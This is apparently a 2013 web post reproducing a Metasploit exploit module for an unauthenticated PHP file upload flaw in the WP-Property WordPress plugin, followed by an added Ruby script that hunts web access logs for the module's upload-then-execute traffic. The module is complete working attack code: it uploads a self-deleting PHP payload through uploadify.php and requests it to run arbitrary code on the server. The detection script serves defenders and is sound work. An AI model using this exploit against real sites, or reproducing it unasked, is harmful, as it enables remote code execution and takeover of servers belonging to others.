WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Requests the upload handler; a 200 response only shows that the file is present.
  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the file part ("Filedata") and the destination directory ("folder").
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used as the path of the uploaded file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
```

Don't ask me what this is or how to use it; I'm talking about msf.
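
For defenders, the traffic this module generates (a POST to uploadify.php, then a request for a new script in the same plugin directory) can be hunted for in web access logs. The Ruby sketch below is an added example, not part of the original post or of Metasploit; the combined log format, the `known_scripts` allowlist and the sample lines are assumptions constructed for illustration.

```ruby
# Added example, not from the original post: hunt access logs for the
# upload-then-request pattern. Combined log format is an assumption.
UPLOADIFY = %r{/wp-content/plugins/wp-property/third-party/uploadify/(?<file>[^?\s]*)}i
LOG_LINE  = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<verb>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3})/
SCRIPT    = /\.(?:php\d?|phtml|phar)\z/i

# known_scripts: script files a clean copy of the plugin ships in that
# directory (hypothetical allowlist; extend it from your own install).
def scan_uploadify(lines, known_scripts: ['uploadify.php'])
  upload_seen = false
  findings = []
  lines.each do |line|
    req = LOG_LINE.match(line)
    next unless req
    hit = UPLOADIFY.match(req[:path])
    next unless hit
    file = hit[:file]
    base = { ip: req[:ip], ts: req[:ts], file: file, status: req[:status].to_i }
    if file.casecmp?('uploadify.php')
      next unless req[:verb] == 'POST'
      # A POST answered with 200 means the upload handler ran for this client.
      upload_seen ||= (base[:status] == 200)
      findings << base.merge(kind: :upload_post)
    elsif file =~ SCRIPT && known_scripts.none? { |k| k.casecmp?(file) }
      # Unknown script under the upload directory: review it, and treat it
      # as urgent when an upload was logged earlier.
      findings << base.merge(kind: :unknown_script, after_upload: upload_seen)
    end
  end
  findings
end

# Constructed sample log lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = [
  '198.51.100.4 - - [04/Jan/2013:19:40:00 +0000] "GET /wordpress/ HTTP/1.1" 200 5120',
  '203.0.113.7 - - [04/Jan/2013:19:40:01 +0000] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 61',
  '198.51.100.4 - - [04/Jan/2013:19:40:02 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900',
  '203.0.113.7 - - [04/Jan/2013:19:40:03 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0'
].freeze

scan_uploadify(SAMPLE_LOG).each { |f| puts f.inspect }
```

Because the module sends the destination directory in the client-supplied `folder` form field, the POST to uploadify.php is the primary signal; the follow-up script request is corroboration.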